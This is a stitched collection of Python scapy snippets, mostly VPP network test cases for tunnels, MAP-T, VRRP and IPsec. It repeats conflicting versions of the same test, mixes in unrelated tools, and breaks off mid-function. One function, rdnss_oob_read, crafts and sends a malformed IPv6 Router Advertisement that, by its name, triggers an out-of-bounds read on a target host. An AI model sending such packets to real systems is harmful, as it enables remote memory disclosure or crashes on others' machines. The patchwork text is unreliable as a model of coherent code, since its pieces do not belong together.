def create_packet_header_IPv6_SRH_IPv4(self, srcaddr, sidlist, segleft):
"""Create packet header: IPv4 encapsulated in SRv6:
IPv6 header with SRH, IPv4 header, UDP header
:param int srcaddr: outer source address
:param list sidlist: segment list of outer IPv6 SRH
:param int segleft: segments-left field of outer IPv6 SRH
Outer IPv6 source address is set to srcaddr
Outer IPv6 destination address is set to sidlist[segleft]
Inner IPv4 source address is 123.1.1.1
Inner IPv4 destination address is 124.1.1.1
UDP source port and destination port are 1234
"""
p = IPv6(src=srcaddr, dst=sidlist[segleft]) / \
IPv6ExtHdrSegmentRouting(addresses=sidlist,
segleft=segleft, nh=4) / \
IP(src='123.1.1.1', dst='124.1.1.1') / \
UDP(sport=1234, dport=1234)
return p
def vrrp_adv_packet(self, prio=None, src_ip=None):
dst_ip = self._adv_dest_ip
if prio is None:
prio = self._prio
eth = Ether(dst=self._adv_dest_mac, src=self._virtual_mac)
vrrp = VRRPv3(vrid=self._vr_id,
priority=prio,
ipcount=len(self._vips),
adv=self._intvl)
if self._is_ipv6:
src_ip = (self._intf.local_ip6_ll if src_ip is None else src_ip)
ip = IPv6(src=src_ip, dst=dst_ip, nh=IPPROTO_VRRP, hlim=255)
vrrp.addrlist = self._vips
else:
src_ip = (self._intf.local_ip4 if src_ip is None else src_ip)
ip = IP(src=src_ip, dst=dst_ip, proto=IPPROTO_VRRP, ttl=255, id=0)
vrrp.addrlist = self._vips
# Fill in default values & checksums
pkt = Ether(raw(eth / ip / vrrp))
return pkt
def create_stream(self, src_if, packet_sizes):
"""Create input packet stream for defined interface.
:param VppInterface src_if: Interface to create packet stream for.
:param list packet_sizes: Required packet sizes.
"""
pkts = []
for i in range(0, 257):
dst_if = self.flows[src_if][i % 2]
info = self.create_packet_info(src_if, dst_if)
payload = self.info_to_payload(info)
p = (Ether(dst=src_if.local_mac, src=src_if.remote_mac) /
IPv6(src=src_if.remote_ip6, dst=dst_if.remote_ip6) /
UDP(sport=1234, dport=1234) / Raw(payload))
info.data = p.copy()
if isinstance(src_if, VppSubInterface):
p = src_if.add_dot1_layer(p)
size = packet_sizes[(i // 2) % len(packet_sizes)]
self.extend_packet(p, size)
pkts.append(p)
return pkts
def test_6rd_ip4_to_ip6_suffix(self):
""" ip4 -> ip6 (decap) 6rd test """
rv = self.vapi.sixrd_add_tunnel(
0, str(ip_address('2002::').packed), 16,
str(ip_address('172.0.0.0').packed), 8,
str(ip_address(self.pg0.local_ip4).packed), 0, True)
self.assertEqual(rv.retval, 0)
self.tunnel_index = rv.sw_if_index
self.vapi.cli("show ip6 fib")
p_ether = Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac)
p_ip4 = IP(src=self.pg1.remote_ip4, dst=self.pg0.local_ip4)
p_ip6 = (IPv6(src="2002:1002:0200::1", dst=self.pg1.remote_ip6) /
UDP(sport=1234, dport=1234))
p = (p_ether / p_ip4 / p_ip6)
rx = self.send_and_expect(self.pg0, p * 10, self.pg1)
for p in rx:
self.validate_4in6(p, p_ip6)
def send_packet(self, msg_type, t1=None, t2=None, iapdopt=None):
if t1 is None:
t1 = self.T1
if t2 is None:
t2 = self.T2
if iapdopt is None:
opt_ia_pd = DHCP6OptIA_PD(iaid=1, T1=t1, T2=t2)
else:
opt_ia_pd = DHCP6OptIA_PD(iaid=1, T1=t1, T2=t2, iapdopt=iapdopt)
p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
IPv6(src=util.mk_ll_addr(self.pg0.remote_mac),
dst=self.pg0.local_ip6_ll) /
UDP(sport=547, dport=546) /
msg_type(trid=self.trid) /
DHCP6OptServerId(duid=self.server_duid) /
DHCP6OptClientId(duid=self.client_duid) /
opt_ia_pd
)
self.pg0.add_stream([p])
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
def test_map_t_echo_request_ip6_to_ip4(self):
""" MAP-T echo request IPv6 -> IPv4 """
eth = Ether(src=self.pg1.remote_mac,
dst=self.pg1.local_mac)
ip = IPv6(src=self.ipv6_cpe_address,
dst=self.ipv6_map_address)
icmp = ICMPv6EchoRequest()
icmp.id = self.ipv6_udp_or_tcp_map_port
payload = "H" * 10
tx_pkt = eth / ip / icmp / payload
self.pg_send(self.pg1, tx_pkt * 1)
rx_pkts = self.pg0.get_capture(1)
rx_pkt = rx_pkts[0]
self.assertEqual(rx_pkt[IP].proto, IP(proto="icmp").proto)
self.assertEqual(rx_pkt[ICMP].type, ICMP(type="echo-request").type)
self.assertEqual(rx_pkt[ICMP].code, 0)
self.assertEqual(rx_pkt[ICMP].id, self.ipv6_udp_or_tcp_map_port)
def test_map_t_tcp_ip6_to_ip4(self):
""" MAP-T TCP IPv6 -> IPv4 """
eth = Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac)
ip = IPv6(src=self.ipv6_cpe_address, dst=self.ipv6_map_address)
tcp = TCP(sport=self.ipv6_udp_or_tcp_map_port,
dport=self.ipv6_udp_or_tcp_internet_port)
payload = "a" * 82
tx_pkt = eth / ip / tcp / payload
self.pg_send(self.pg1, tx_pkt * 1)
rx_pkts = self.pg0.get_capture(1)
rx_pkt = rx_pkts[0]
self.v4_address_check(rx_pkt)
self.v4_port_check(rx_pkt, TCP)
self.assertEqual(rx_pkt[IP].proto, IP(proto="tcp").proto)
self.assertEqual(rx_pkt[IP].tos, 0) # IPv6 TC passed to v4 ToS
df_bit = IP(flags="DF").flags
self.assertNotEqual(rx_pkt[IP].flags & df_bit, df_bit)
def recv_raw(self, x=MTU):
try:
data, address = self.ins.recvfrom(x)
except IOError: # BlockingIOError
return None, None, None
from scapy.layers.inet import IP
from scapy.layers.inet6 import IPv6
if self.ipv6:
# AF_INET6 does not return the IPv6 header. Let's build it
# (host, port, flowinfo, scopeid)
host, _, flowinfo, _ = address
header = raw(
IPv6(
src=host,
dst=self.host_ip6,
fl=flowinfo,
nh=self.proto, # fixed for AF_INET6
plen=len(data)))
return IPv6, header + data, time.time()
else:
return IP, data, time.time()
def test_6rd_ip4_to_ip6_suffix(self):
""" ip4 -> ip6 (decap) 6rd test """
rv = self.vapi.ipip_6rd_add_tunnel(0, inet_pton(AF_INET6,
'2002::'), 16, 0,
inet_pton(AF_INET, '172.0.0.0'), 8,
self.pg0.local_ip4n, True)
self.tunnel_index = rv.sw_if_index
self.vapi.cli("show ip6 fib")
p_ether = Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac)
p_ip4 = IP(src=self.pg1.remote_ip4, dst=self.pg0.local_ip4)
p_ip6 = (IPv6(src="2002:1002:0200::1", dst=self.pg1.remote_ip6) /
UDP(sport=1234, dport=1234))
p = (p_ether / p_ip4 / p_ip6)
rx = self.send_and_expect(self.pg0, p * 10, self.pg1)
for p in rx:
self.validate_4in6(p, p_ip6)
self.vapi.ipip_6rd_del_tunnel(self.tunnel_index)
def test_map_t_tcp_ip4_to_ip6(self):
"""MAP-T TCP IPv4 -> IPv6"""
eth = Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac)
ip = IP(src=self.pg0.remote_ip4, dst=self.ipv4_map_address, tos=0)
tcp = TCP(
sport=self.ipv4_udp_or_tcp_internet_port,
dport=self.ipv4_udp_or_tcp_map_port,
)
payload = "a" * 82
tx_pkt = eth / ip / tcp / payload
self.pg_send(self.pg0, tx_pkt * 1)
rx_pkts = self.pg1.get_capture(1)
rx_pkt = rx_pkts[0]
self.v6_address_check(rx_pkt)
self.v6_port_check(rx_pkt, TCP)
self.assertEqual(rx_pkt[IPv6].tc, 0) # IPv4 ToS passed to v6 TC
self.assertEqual(rx_pkt[IPv6].nh, IPv6(nh="TCP").nh)
def test_vrrp6_backup_nond(self):
""" IPv6 Backup VR ignores NDP """
# We need an address for a virtual IP that is not the IP that
# ARP requests will originate from
vr_id = 100
prio = 100
intvl = self._default_adv
intvl_s = intvl * 0.01
vip = self.pg0.remote_hosts[1].ip6
vr = VppVRRPVirtualRouter(self,
self.pg0,
vr_id,
prio=prio,
intvl=intvl,
flags=self._default_flags,
vips=[vip])
vr.add_vpp_config()
self._vrs.append(vr)
nsma = in6_getnsma(inet_pton(socket.AF_INET6, vip))
dmac = in6_getnsmac(nsma)
dst_ip = inet_ntop(socket.AF_INET6, nsma)
ndp_req = (Ether(dst=dmac, src=self.pg0.remote_mac) /
IPv6(dst=dst_ip, src=self.pg0.remote_ip6) /
ICMPv6ND_NS(tgt=vip) /
ICMPv6NDOptSrcLLAddr(lladdr=self.pg0.remote_mac))
# Before the VR is started make sure no reply to request for VIP
self.send_and_assert_no_replies(self.pg0, [ndp_req], timeout=1)
# VR should start in backup state and still should not reply to NDP
# send a higher priority adv to make sure it does not become master
adv = vr.vrrp_adv_packet(prio=prio + 10, src_ip=self.pg0.remote_ip6)
pkts = [adv, ndp_req]
vr.start_stop(is_start=1)
self.send_and_assert_no_replies(self.pg0, pkts, timeout=intvl_s)
vr.start_stop(is_start=0)
def verify_tun_64(self, p, count=1):
self.vapi.cli("clear errors")
try:
config_tun_params(p, self.encryption_type, self.tun_if)
send_pkts = self.gen_encrypt_pkts6(p.scapy_tun_sa,
self.tun_if,
src=p.remote_tun_if_host6,
dst=self.pg1.remote_ip6,
count=count)
recv_pkts = self.send_and_expect(self.tun_if, send_pkts, self.pg1)
for recv_pkt in recv_pkts:
self.assert_equal(recv_pkt[IPv6].src, p.remote_tun_if_host6)
self.assert_equal(recv_pkt[IPv6].dst, self.pg1.remote_ip6)
self.assert_packet_checksums_valid(recv_pkt)
send_pkts = self.gen_pkts6(self.pg1,
src=self.pg1.remote_ip6,
dst=p.remote_tun_if_host6,
count=count)
recv_pkts = self.send_and_expect(self.pg1, send_pkts, self.tun_if)
for recv_pkt in recv_pkts:
try:
decrypt_pkt = p.vpp_tun_sa.decrypt(recv_pkt[IP])
if not decrypt_pkt.haslayer(IPv6):
decrypt_pkt = IPv6(decrypt_pkt[Raw].load)
self.assert_equal(decrypt_pkt.src, self.pg1.remote_ip6)
self.assert_equal(decrypt_pkt.dst, p.remote_tun_if_host6)
self.assert_packet_checksums_valid(decrypt_pkt)
except:
self.logger.error(ppp("Unexpected packet:", recv_pkt))
try:
self.logger.debug(ppp("Decrypted packet:",
decrypt_pkt))
except:
pass
raise
finally:
self.logger.info(self.vapi.ppcli("show error"))
self.logger.info(self.vapi.ppcli("show ipsec all"))
self.verify_counters(p, count)
def test_tun_basic66(self, count=1):
""" ipsec 6o6 tunnel basic test """
try:
p = self.params[socket.AF_INET6]
vpp_tun_sa, scapy_tun_sa = self.configure_sa_tun(p)
send_pkts = self.gen_encrypt_pkts6(scapy_tun_sa,
self.tun_if,
src=p.remote_tun_if_host,
dst=self.pg1.remote_ip6,
count=count)
recv_pkts = self.send_and_expect(self.tun_if, send_pkts, self.pg1)
for recv_pkt in recv_pkts:
self.assert_equal(recv_pkt[IPv6].src, p.remote_tun_if_host)
self.assert_equal(recv_pkt[IPv6].dst, self.pg1.remote_ip6)
self.assert_packet_checksums_valid(recv_pkt)
send_pkts = self.gen_pkts6(self.pg1,
src=self.pg1.remote_ip6,
dst=p.remote_tun_if_host,
count=count)
recv_pkts = self.send_and_expect(self.pg1, send_pkts, self.tun_if)
for recv_pkt in recv_pkts:
try:
decrypt_pkt = vpp_tun_sa.decrypt(recv_pkt[IPv6])
if not decrypt_pkt.haslayer(IPv6):
decrypt_pkt = IPv6(decrypt_pkt[Raw].load)
self.assert_equal(decrypt_pkt.src, self.pg1.remote_ip6)
self.assert_equal(decrypt_pkt.dst, p.remote_tun_if_host)
self.assert_packet_checksums_valid(decrypt_pkt)
except:
self.logger.debug(ppp("Unexpected packet:", recv_pkt))
try:
self.logger.debug(ppp("Decrypted packet:",
decrypt_pkt))
except:
pass
raise
finally:
self.logger.info(self.vapi.ppcli("show error"))
self.logger.info(self.vapi.ppcli("show ipsec"))
def create_stream(self, src_if, dst_if, packet_sizes,
proto_l=UDP(sport=1234, dport=5678)):
"""Create input packet stream for defined interfaces.
:param VppInterface src_if: Source Interface for packet stream.
:param VppInterface dst_if: Destination Interface for packet stream.
:param list packet_sizes: packet size to test.
:param Scapy proto_l: Required IP protocol. Default protocol is UDP.
"""
pkts = []
for size in packet_sizes:
info = self.create_packet_info(src_if, dst_if)
payload = self.info_to_payload(info)
p = (Ether(dst=src_if.local_mac, src=src_if.remote_mac) /
IPv6(src=src_if.remote_ip6, dst=dst_if.remote_ip6) /
proto_l /
Raw(payload))
info.data = p.copy()
self.extend_packet(p, size)
pkts.append(p)
return pkts
def handle_ns_request(self, pipe, packet):
'''
process incoming NS request and send
corresponding NA.
'''
self.log("ND: RX NS: {0} <-- {1},{2}".format(packet[ICMPv6ND_NS].tgt,
packet[IPv6].src,
packet[Ether].src))
na_response = Ether(src=packet[Ether].dst, dst=packet[Ether].src)/ \
IPv6(src=packet[ICMPv6ND_NS].tgt, dst=packet[IPv6].src, hlim = 255)/ \
ICMPv6ND_NA(tgt=packet[ICMPv6ND_NS].tgt, R = 0, S = 1, O = 1)/ \
ICMPv6NDOptDstLLAddr(lladdr=packet[Ether].dst)
if not self.vlan.is_default():
self.vlan.embed(na_response, fmt=self.fmt)
self.log("ND: TX NA: {0},{1} -> {2},{3}".format(
packet[ICMPv6ND_NS].tgt, packet[Ether].dst, packet[IPv6].src,
packet[Ether].src))
pipe.async_tx_pkt(na_response)
self.record.verified()
def test_no_p2p_subif(self):
"""standard routing without p2p subinterfaces"""
self.logger.info("FFP_TEST_START_0001")
route_8000 = VppIpRoute(self,
"8000::",
64, [
VppRoutePath(self.pg0.remote_ip6,
self.pg0.sw_if_index,
proto=DpoProto.DPO_PROTO_IP6)
],
is_ip6=1)
route_8000.add_vpp_config()
self.packets = [
(Ether(dst=self.pg1.local_mac, src=self.pg1.remote_mac) /
IPv6(src="3001::1", dst="8000::100") /
UDP(sport=1234, dport=1234) / Raw('\xa5' * 100))
]
self.send_packets(self.pg1, self.pg0)
self.logger.info("FFP_TEST_FINISH_0001")
def test_6rd_ip4_to_ip6_suffix(self):
""" ip4 -> ip6 (decap) 6rd test """
rv = self.vapi.ipip_6rd_add_tunnel(ip6_table_id=0,
ip4_table_id=0,
ip6_prefix='2002::/16',
ip4_prefix='172.0.0.0/8',
ip4_src=self.pg0.local_ip4,
security_check=True)
self.tunnel_index = rv.sw_if_index
self.vapi.cli("show ip6 fib")
p_ether = Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac)
p_ip4 = IP(src=self.pg1.remote_ip4, dst=self.pg0.local_ip4)
p_ip6 = (IPv6(src="2002:1002:0200::1", dst=self.pg1.remote_ip6) /
UDP(sport=1234, dport=1234))
p = (p_ether / p_ip4 / p_ip6)
rx = self.send_and_expect(self.pg0, p * 10, self.pg1)
for p in rx:
self.validate_4in6(p, p_ip6)
self.vapi.ipip_6rd_del_tunnel(self.tunnel_index)
def test_vrrp6_accept_mode_disabled(self):
""" IPv6 Master VR does not reply for VIP w/ accept mode off """
# accept mode only matters when prio < 255, so it will have to
# come up as a backup and take over as master after the timeout
vr_id = 100
prio = 100
intvl = self._default_adv
vip = self.pg0.remote_hosts[4].ip6
vr = VppVRRPVirtualRouter(self, self.pg0, vr_id,
prio=prio, intvl=intvl,
flags=self._default_flags,
vips=[vip])
self._vrs.append(vr)
vr.add_vpp_config()
# After adding the VR, it should be in the init state
vr.assert_state_equals(VRRP_VR_STATE_INIT)
# start VR
vr.start_stop(is_start=1)
vr.assert_state_equals(VRRP_VR_STATE_BACKUP)
# wait for VR to take over as master
end_time = vr.start_time() + vr.master_down_seconds()
sleep_s = end_time - time.time()
time.sleep(sleep_s)
vr.assert_state_equals(VRRP_VR_STATE_MASTER)
# send an ICMPv6 echo to the VR virtual IP address
echo = (Ether(dst=vr.virtual_mac(), src=self.pg0.remote_mac) /
IPv6(dst=vip, src=self.pg0.remote_ip6) /
ICMPv6EchoRequest(seq=1, id=self.pg0.sw_if_index))
self.pg_send(self.pg0, [echo])
# wait for an echo reply. none should be received
time.sleep(1)
self.pg0.assert_nothing_captured(filter_out_fn=is_not_echo_reply)
def test_map_t_echo_reply_ip4_to_ip6(self):
""" MAP-T echo reply IPv4 -> IPv6 """
eth = Ether(src=self.pg1.remote_mac,
dst=self.pg1.local_mac)
ip = IP(src=self.pg0.remote_ip4,
dst=self.ipv4_map_address)
icmp = ICMP(type="echo-reply",
id=self.ipv6_udp_or_tcp_map_port)
payload = "H" * 10
tx_pkt = eth / ip / icmp / payload
self.pg_send(self.pg0, tx_pkt * 1)
rx_pkts = self.pg1.get_capture(1)
rx_pkt = rx_pkts[0]
self.assertEqual(rx_pkt[IPv6].nh, IPv6(nh="ICMPv6").nh)
self.assertEqual(rx_pkt[ICMPv6EchoReply].type,
ICMPv6EchoReply(type="Echo Reply").type)
self.assertEqual(rx_pkt[ICMPv6EchoReply].code, 0)
self.assertEqual(rx_pkt[ICMPv6EchoReply].id,
self.ipv6_udp_or_tcp_map_port)
def rdnss_oob_read(target_addr):
def build_domain_name(name_len):
CHUNKS = name_len // 0x3f
subdomains = []
for i in range(CHUNKS):
subdomains.append(string.ascii_lowercase[i] * 0x3f)
domain = '.'.join(subdomains)
print('final len(domain) :{}'.format(len(domain)))
return domain
ip = IPv6(dst=target_addr, hlim=255)
ra = ICMPv6ND_RA()
dnssl1 = ICMPv6NDOptDNSSL(lifetime=1, searchlist=[build_domain_name(1024)])
dnssl2 = ICMPv6NDOptDNSSL(lifetime=1, searchlist=[build_domain_name(375)])
dnssl3 = ICMPv6NDOptDNSSL(lifetime=1, searchlist=['1' * 22])
rdnss = MyICMPv6NDOptRDNSS(lifetime=1)
pkt = ip / ra / dnssl1 / dnssl2 / dnssl3 / rdnss
print("total pakcet len: %d" % (len(pkt)))
print("total ipv6 len: %d" % (len(ra / dnssl1 / dnssl2 / dnssl3 / rdnss)))
send(pkt)
def upnp_probe():
"""
send out a series of UPNP probes (IP4 & IP6)
"""
global iface_bcast_addr
probe = "M-SEARCH * HTTP/1.1\r\n" \
"Host:{IP}:1900\r\n" \
"ST:{ST}\r\n" \
"Man:\"ssdp:discover\"\r\n" \
"MX:5\r\n" \
"USER-AGENT: OS/version UPnP/1.1 whoshere/1.0\r\n\r\n"
# if iface_bcast_addr is None:
# iface_bcast_addr = get_brdaddr(ArpMon.iface)
# send(IP(dst=iface_bcast_addr) / UDP(sport=1900, dport=1900) / \
# probe.format("ssdp:all"), loop=2, inter=0.3)
# time.sleep(.5)
send(IP(dst="239.255.255.250") / UDP(sport=1900, dport=1900) / \
probe.format(ST="ssdp:all", IP="239.255.255.250"))
time.sleep(.5)
send(IPv6(dst="ff02::c") / UDP(sport=1900, dport=1900) / \
probe.format(ST="ssdp:all", IP="[ff02::c]"))
def create_packet_header_IPv6_SRH_L2(self, sidlist, segleft, vlan=0):
"""Create packet header: L2 encapsulated in SRv6:
IPv6 header with SRH, L2
:param list sidlist: segment list of outer IPv6 SRH
:param int segleft: segments-left field of outer IPv6 SRH
:param vlan: L2 vlan; if vlan!=0 then add 802.1q header
Outer IPv6 destination address is set to sidlist[segleft]
IPv6 source address is 1234::1
"""
eth = Ether(src='00:11:22:33:44:55', dst='00:55:44:33:22:11')
etype = 0x8137 # IPX
if vlan:
# add 802.1q layer
eth /= Dot1Q(vlan=vlan, type=etype)
else:
eth.type = etype
p = (IPv6(src='1234::1', dst=sidlist[segleft]) /
IPv6ExtHdrSegmentRouting(
addresses=sidlist, segleft=segleft, nh=59) / eth)
return p
def test_6rd_ip4_to_ip6_vrf(self):
"""ip4 -> ip6 (decap) 6rd VRF test"""
rv = self.vapi.ipip_6rd_add_tunnel(
ip6_table_id=20,
ip4_table_id=10,
ip6_prefix="2002::/16",
ip4_prefix="0.0.0.0/0",
ip4_src=self.pg2.local_ip4,
security_check=True,
)
self.tunnel_index = rv.sw_if_index
rv = self.vapi.ipip_6rd_del_tunnel(rv.sw_if_index)
rv = self.vapi.ipip_6rd_add_tunnel(
ip6_table_id=20,
ip4_table_id=10,
ip6_prefix="2002::/16",
ip4_prefix="0.0.0.0/0",
ip4_src=self.pg2.local_ip4,
security_check=True,
)
self.tunnel_index = rv.sw_if_index
self.vapi.sw_interface_set_table(self.tunnel_index, 1, 20)
p_ip6 = IPv6(src="2002:AC10:0402::1", dst=self.pg3.remote_ip6) / UDP(
sport=1234, dport=1234)
p = (Ether(src=self.pg2.remote_mac, dst=self.pg2.local_mac) /
IP(src=self.pg3.remote_ip4, dst=self.pg2.local_ip4) / p_ip6)
p_reply = p_ip6
rx = self.send_and_expect(self.pg2, p * 10, self.pg3)
for p in rx:
self.validate_4in6(p, p_reply)
self.vapi.sw_interface_set_table(self.tunnel_index, 1, 0)
self.vapi.ipip_6rd_del_tunnel(self.tunnel_index)
def create_stream(self, pg_id):
pg_targets = [None] * 3
pg_targets[0] = [1, 2]
pg_targets[1] = [0, 2]
pg_targets[2] = [0, 1]
pkts = []
for i in range(0, 257):
target_pg_id = pg_targets[pg_id][i % 2]
info = self.create_packet_info(pg_id, target_pg_id)
payload = self.info_to_payload(info)
p = (Ether(dst=self.VPP_MACS[pg_id], src=self.MY_MACS[pg_id]) /
IPv6(src=self.MY_SOFT_IP6S[pg_id],
dst=self.MY_SOFT_IP6S[target_pg_id]) /
UDP(sport=1234, dport=1234) / Raw(payload))
info.data = p.copy()
self.add_dot1_layers(pg_id, p)
if not isinstance(self.INT_DETAILS[pg_id], self.Subint):
packet_sizes = [76, 512, 1518, 9018]
else:
packet_sizes = [76, 512, 1518 + 4, 9018 + 4]
size = packet_sizes[(i / 2) % len(packet_sizes)]
self.extend_packet(p, size)
pkts.append(p)
return pkts
def icmpv6_rs(ifname):
ll_mac = get_mac_address(ifname) # 获取本机接口MAC地址
# -----------IPv6头部------------
# Next Header: 0x3A (ICMPv6)
# 原地址: Link Local address
# 目的地址: FF02::2(所有路由器)
base = IPv6(src=mac_to_ipv6_linklocal(ll_mac), dst='ff02::2')
# ----------ICMPv6头部----------
# ICMPv6 Type: 133
# ICMPv6 Code: 0 (RS)
router_solicitation = ICMPv6ND_RS()
# ----Source Link-Layer Address----
# 源地址: 本地MAC地址
src_ll_addr = ICMPv6NDOptSrcLLAddr(lladdr=ll_mac)
# 构建数据包
packet = base / router_solicitation / src_ll_addr
# packet.show()
# 发送数据包,接受返回数据包
result = sr1(packet, timeout=2, verbose=False)
# result.show()
# 提取返回数据包中的网关MAC
print(
"gwmac: ",
result.getlayer(
"ICMPv6 Neighbor Discovery Option - Source Link-Layer Address").
fields['lladdr'])
# 提取返回数据包中的MTU
print(
"mtu: ",
result.getlayer(
"ICMPv6 Neighbor Discovery Option - MTU").fields['mtu'])
# 提取返回数据包中的Prefix信息
print(
"prefix: ",
result.getlayer("ICMPv6 Neighbor Discovery Option - Prefix Information"
).fields['prefix'])
def test_gbp(self):
""" Group Based Policy """
nat_table = VppIpTable(self, 20)
nat_table.add_vpp_config()
nat_table = VppIpTable(self, 20, is_ip6=True)
nat_table.add_vpp_config()
#
# Bridge Domains
#
self.vapi.bridge_domain_add_del(1,
flood=1,
uu_flood=1,
forward=1,
learn=0,
arp_term=1,
is_add=1)
self.vapi.bridge_domain_add_del(2,
flood=1,
uu_flood=1,
forward=1,
learn=0,
arp_term=1,
is_add=1)
self.vapi.bridge_domain_add_del(20,
flood=1,
uu_flood=1,
forward=1,
learn=0,
arp_term=1,
is_add=1)
#
# 3 EPGs, 2 of which share a BD.
#
epgs = []
recircs = []
epgs.append(
VppGbpEndpointGroup(self, 220, 0, 1, self.pg4, self.loop0,
"10.0.0.128", "2001:10::128"))
recircs.append(VppGbpRecirc(self, epgs[0], self.loop3))
epgs.append(
VppGbpEndpointGroup(self, 221, 0, 1, self.pg5, self.loop0,
"10.0.1.128", "2001:10:1::128"))
recircs.append(VppGbpRecirc(self, epgs[1], self.loop4))
epgs.append(
VppGbpEndpointGroup(self, 222, 0, 2, self.pg6, self.loop1,
"10.0.2.128", "2001:10:2::128"))
recircs.append(VppGbpRecirc(self, epgs[2], self.loop5))
#
# 2 NAT EPGs, one for floating-IP subnets, the other for internet
#
epgs.append(
VppGbpEndpointGroup(self, 333, 20, 20, self.pg7, self.loop2,
"11.0.0.128", "3001::128"))
recircs.append(VppGbpRecirc(self, epgs[3], self.loop6, is_ext=True))
epgs.append(
VppGbpEndpointGroup(self, 444, 20, 20, self.pg8, self.loop2,
"11.0.0.129", "3001::129"))
recircs.append(VppGbpRecirc(self, epgs[4], self.loop8, is_ext=True))
epg_nat = epgs[3]
recirc_nat = recircs[3]
#
# 4 end-points, 2 in the same subnet, 3 in the same BD
#
eps = []
eps.append(
VppGbpEndpoint(self, self.pg0, epgs[0], recircs[0], "10.0.0.1",
"11.0.0.1"))
eps.append(
VppGbpEndpoint(self, self.pg1, epgs[0], recircs[0], "10.0.0.2",
"11.0.0.2"))
eps.append(
VppGbpEndpoint(self, self.pg2, epgs[1], recircs[1], "10.0.1.1",
"11.0.0.3"))
eps.append(
VppGbpEndpoint(self, self.pg3, epgs[2], recircs[2], "10.0.2.1",
"11.0.0.4"))
eps.append(
VppGbpEndpoint(self,
self.pg0,
epgs[0],
recircs[0],
"2001:10::1",
"3001::1",
is_ip6=True))
eps.append(
VppGbpEndpoint(self,
self.pg1,
epgs[0],
recircs[0],
"2001:10::2",
"3001::2",
is_ip6=True))
eps.append(
VppGbpEndpoint(self,
self.pg2,
epgs[1],
recircs[1],
"2001:10:1::1",
"3001::3",
is_ip6=True))
eps.append(
VppGbpEndpoint(self,
self.pg3,
epgs[2],
recircs[2],
"2001:10:2::1",
"3001::4",
is_ip6=True))
#
# Config related to each of the EPGs
#
for epg in epgs:
# IP config on the BVI interfaces
if epg != epgs[1] and epg != epgs[4]:
epg.bvi.set_table_ip4(epg.rd)
epg.bvi.set_table_ip6(epg.rd)
# The BVIs are NAT inside interfaces
self.vapi.nat44_interface_add_del_feature(epg.bvi.sw_if_index,
is_inside=1,
is_add=1)
self.vapi.nat66_add_del_interface(epg.bvi.sw_if_index,
is_inside=1,
is_add=1)
self.vapi.sw_interface_add_del_address(epg.bvi.sw_if_index,
epg.bvi_ip4_n, 32)
self.vapi.sw_interface_add_del_address(epg.bvi.sw_if_index,
epg.bvi_ip6_n,
128,
is_ipv6=True)
# EPG uplink interfaces in the BD
epg.uplink.set_table_ip4(epg.rd)
epg.uplink.set_table_ip6(epg.rd)
self.vapi.sw_interface_set_l2_bridge(epg.uplink.sw_if_index,
epg.bd)
# add the BD ARP termination entry for BVI IP
self.vapi.bd_ip_mac_add_del(bd_id=epg.bd,
mac=mactobinary(self.router_mac),
ip=epg.bvi_ip4_n,
is_ipv6=0,
is_add=1)
self.vapi.bd_ip_mac_add_del(bd_id=epg.bd,
mac=mactobinary(self.router_mac),
ip=epg.bvi_ip6_n,
is_ipv6=1,
is_add=1)
# epg[1] shares the same BVI to epg[0]
if epg != epgs[1] and epg != epgs[4]:
# BVI in BD
self.vapi.sw_interface_set_l2_bridge(epg.bvi.sw_if_index,
epg.bd,
bvi=1)
# BVI L2 FIB entry
self.vapi.l2fib_add_del(self.router_mac,
epg.bd,
epg.bvi.sw_if_index,
is_add=1,
bvi_mac=1)
# EPG in VPP
epg.add_vpp_config()
for recirc in recircs:
# EPG's ingress recirculation interface maps to its RD
recirc.recirc.set_table_ip4(recirc.epg.rd)
recirc.recirc.set_table_ip6(recirc.epg.rd)
# in the bridge to allow DVR. L2 emulation to punt to L3
self.vapi.sw_interface_set_l2_bridge(recirc.recirc.sw_if_index,
recirc.epg.bd)
self.vapi.sw_interface_set_l2_emulation(recirc.recirc.sw_if_index)
self.vapi.nat44_interface_add_del_feature(
recirc.recirc.sw_if_index, is_inside=0, is_add=1)
self.vapi.nat66_add_del_interface(recirc.recirc.sw_if_index,
is_inside=0,
is_add=1)
recirc.add_vpp_config()
ep_routes = []
ep_arps = []
for ep in eps:
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
#
# routes to the endpoints. We need these since there are no
# adj-fibs due to the fact the the BVI address has /32 and
# the subnet is not attached.
#
r = VppIpRoute(
self,
ep.ip,
ep.ip_len,
[VppRoutePath(ep.ip, ep.epg.bvi.sw_if_index, proto=ep.proto)],
is_ip6=ep.is_ip6)
r.add_vpp_config()
ep_routes.append(r)
#
# ARP entries for the endpoints
#
a = VppNeighbor(self,
ep.epg.bvi.sw_if_index,
ep.itf.remote_mac,
ep.ip,
af=ep.af)
a.add_vpp_config()
ep_arps.append(a)
# add each EP itf to the its BD
self.vapi.sw_interface_set_l2_bridge(ep.itf.sw_if_index, ep.epg.bd)
# add the BD ARP termination entry
self.vapi.bd_ip_mac_add_del(bd_id=ep.epg.bd,
mac=ep.bin_mac,
ip=ep.ip_n,
is_ipv6=0,
is_add=1)
# L2 FIB entry
self.vapi.l2fib_add_del(ep.mac,
ep.epg.bd,
ep.itf.sw_if_index,
is_add=1)
# Add static mappings for each EP from the 10/8 to 11/8 network
if ep.af == AF_INET:
self.vapi.nat44_add_del_static_mapping(ep.ip_n,
ep.floating_ip_n,
vrf_id=0,
addr_only=1)
else:
self.vapi.nat66_add_del_static_mapping(ep.ip_n,
ep.floating_ip_n,
vrf_id=0)
# VPP EP create ...
ep.add_vpp_config()
# ... results in a Gratuitous ARP/ND on the EPG's uplink
rx = ep.epg.uplink.get_capture(1, timeout=0.2)
if ep.is_ip6:
self.assertTrue(rx[0].haslayer(ICMPv6ND_NA))
self.assertEqual(rx[0][ICMPv6ND_NA].tgt, ep.ip)
else:
self.assertTrue(rx[0].haslayer(ARP))
self.assertEqual(rx[0][ARP].psrc, ep.ip)
self.assertEqual(rx[0][ARP].pdst, ep.ip)
# add the BD ARP termination entry for floating IP
self.vapi.bd_ip_mac_add_del(bd_id=epg_nat.bd,
mac=ep.bin_mac,
ip=ep.floating_ip_n,
is_ipv6=ep.is_ip6,
is_add=1)
